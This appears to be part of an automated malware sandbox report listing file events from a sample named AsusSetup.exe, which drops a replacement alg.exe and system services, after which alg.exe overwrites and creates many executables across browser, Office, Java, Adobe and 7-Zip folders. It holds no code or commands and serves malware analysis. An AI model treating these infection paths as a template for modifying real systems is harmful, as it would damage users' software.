Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
